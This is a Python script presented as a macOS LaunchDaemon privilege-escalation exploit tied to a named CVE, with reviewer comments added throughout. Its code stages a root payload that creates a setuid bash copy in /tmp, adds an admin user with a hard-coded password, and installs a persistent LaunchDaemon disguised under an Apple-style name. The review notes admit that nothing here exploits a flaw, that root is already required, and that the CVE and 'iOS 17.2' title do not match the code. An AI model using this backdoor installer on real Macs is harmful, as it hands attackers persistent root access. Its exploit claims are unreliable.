#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This script stages a root payload script and points a LaunchDaemon plist at it. The payload copies /bin/bash to a
# setuid binary in /tmp, creates an admin user ("pentest"), and installs a second LaunchDaemon
# (com.apple.backdoor) for persistent root access. The plist it writes or rewrites is
# /Library/LaunchDaemons/com.apple.securemonitor.plist, and it is loaded with `sudo launchctl load -w`.
# NOTE(review): nothing below exploits a vulnerability. Every privileged step (writing into
# /Library/LaunchDaemons, chown root:wheel, launchctl load via sudo) requires root already, so as written this is a
# root persistence / backdoor installer rather than a privilege escalation — main() even refuses to run when already
# root, which is the only context in which the plist write can succeed. The CVE named in the header is not exercised
# by any code here and should be treated as unverified; the title's "iOS 17.2" also conflicts with the stated
# platform and test target (macOS Sonoma).
import os
import plistlib
import subprocess
import time
from pathlib import Path
# Plist that gets written or rewritten. NOTE(review): /Library/LaunchDaemons is
# normally root-owned (the code itself restores root:wheel / 0644 after writing),
# so this path presupposes a root context rather than providing one.
LAUNCHD_PLIST: str = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
# Stage-2 shell script that launchd is pointed at. A fixed, user-owned path in
# the shared /tmp directory that is later executed as root: whoever controls
# this file first controls the root payload.
PAYLOAD_SCRIPT: str = "/tmp/.macroot_payload.sh"
def create_payload() -> None:
    """Write the stage-2 root payload to PAYLOAD_SCRIPT and mark it executable.

    The generated bash script, when run as root, (1) copies /bin/bash to
    /tmp/.rootbash and sets the setuid bit, (2) creates an admin user ``pentest``
    with a hard-coded password via sysadminctl, (3) appends a timestamp to
    /tmp/.rootlog, and (4) writes a second LaunchDaemon plist
    (com.apple.backdoor, RunAtLoad) that starts /tmp/.rootbash, fixing its
    mode/ownership to 0644 root:wheel.

    Security notes (review): the script lands at a predictable, user-owned path
    under /tmp and is later executed as root by launchd (see
    hijack_launchdaemon), so any local user who pre-creates or replaces that
    file controls what runs as root; the admin password is embedded in
    plaintext; /tmp/.rootbash, /tmp/.rootlog and com.apple.backdoor.plist are
    fixed, trivially detectable indicators.

    Raises:
        OSError: if PAYLOAD_SCRIPT cannot be written or chmod'ed.
    """
    print("[+] Creating root payload script...")
    shell_lines = [
        "#!/bin/bash",
        "# Root shell",
        "cp /bin/bash /tmp/.rootbash",
        "chmod +s /tmp/.rootbash",
        "chown root:wheel /tmp/.rootbash",
        "# Add admin user",
        "sysadminctl -addUser pentest -password macOS123! -admin",
        "# Log file",
        'echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog',
        "# Persistent backdoor",
        "cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist",
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"',
        '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">',
        '<plist version="1.0">',
        "<dict>",
        "<key>Label</key><string>com.apple.backdoor</string>",
        "<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>",
        "<key>RunAtLoad</key><true/>",
        "</dict>",
        "</plist>",
        "EOF",
        "chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist",
        "chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist",
    ]
    # Trailing newline matches the original triple-quoted literal exactly.
    script_text = "\n".join(shell_lines) + "\n"
    target = Path(PAYLOAD_SCRIPT)
    target.write_text(script_text)
    target.chmod(0o755)
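def hijack_launchdaemon() -> None:
    """Point LAUNCHD_PLIST at PAYLOAD_SCRIPT, creating the plist if absent.

    When the plist does not exist a minimal one (Label / ProgramArguments /
    RunAtLoad) is written. When it does, ProgramArguments and RunAtLoad are
    overwritten and every other key is kept — if a daemon of that name really
    exists, its original program is replaced. The file is then left at mode
    0644 owned root:wheel, which is what launchd expects of a daemon plist.

    Change from the original: mode and ownership are set with os.chmod /
    os.chown instead of `os.system("chmod ...")` / `os.system("chown ...")`,
    so there is no shell round-trip and a failure raises instead of being
    discarded as an ignored exit status.

    Raises:
        PermissionError: if /Library/LaunchDaemons is not writable or chown to
            root is not permitted. NOTE(review): that directory is normally
            root-owned, so this only succeeds from an already-root context —
            the function does not itself escalate privileges.
        plistlib.InvalidFileException, ValueError: the existing file is not a
            parseable plist.
    """
    print("[+] Hijacking LaunchDaemon plist...")
    target = Path(LAUNCHD_PLIST)
    if target.exists():
        # Hijack an existing daemon: keep its other keys, swap the program.
        with target.open("rb") as fh:
            plist = plistlib.load(fh)
    else:
        print("[*] Creating fake LaunchDaemon plist for exploitation...")
        plist = {"Label": "com.apple.securemonitor"}
    plist["ProgramArguments"] = [PAYLOAD_SCRIPT]
    plist["RunAtLoad"] = True
    with target.open("wb") as fh:
        plistlib.dump(plist, fh)
    # launchd's ownership rules: daemon plists must be root-owned and not
    # group/world-writable, or they are ignored.
    os.chmod(LAUNCHD_PLIST, 0o644)
    os.chown(LAUNCHD_PLIST, 0, 0)  # uid 0 = root; gid 0 is "wheel" on macOS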
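def trigger_payload() -> None:
    """Ask launchd to load LAUNCHD_PLIST now rather than waiting for a reboot.

    Runs `sudo launchctl load -w <plist>` as an argv list (no shell string)
    and reports a non-zero exit status instead of discarding it as the
    original os.system() call did; the success message is only printed when
    launchctl returned 0. sudo may prompt for a password on the terminal.

    NOTE(review): this function is never called by main(), which only prints
    the equivalent command for the user to run by hand.
    NOTE(review): `launchctl load` is a legacy subcommand; on current macOS
    `launchctl bootstrap system <plist>` is the documented replacement —
    confirm against the target version.
    """
    print("[+] Triggering LaunchDaemon manually...")
    result = subprocess.run(
        ["sudo", "launchctl", "load", "-w", LAUNCHD_PLIST],
        check=False,
    )
    if result.returncode != 0:
        print(f"[!] launchctl exited with status {result.returncode}; daemon not loaded")
        return
    print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")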
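def main() -> None:
    """Entry point: stage the payload, rewrite the plist, print next steps.

    Refuses to run as root (nothing to escalate), then calls create_payload()
    and hijack_launchdaemon(). A PermissionError from either step is reported
    and converted to exit status 1 instead of an unhandled traceback.

    NOTE(review): the plist lives in root-owned /Library/LaunchDaemons, so a
    non-root run is expected to hit exactly that PermissionError in
    hijack_launchdaemon() — the script contains no primitive that grants the
    write, which is why it cannot escalate on its own.
    """
    if os.geteuid() == 0:
        print("[!] You are already root. No need to exploit.")
        return
    try:
        create_payload()
        hijack_launchdaemon()
    except PermissionError as exc:
        # Almost always: /Library/LaunchDaemons is not writable by this user.
        print(f"[-] Permission denied: {exc}")
        print("[-] Writing the LaunchDaemon plist requires root; aborting.")
        raise SystemExit(1) from exc
    print("[+] Exploit completed. Reboot or run manually:")
    print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
    print(" Then run: /tmp/.rootbash -p")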
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()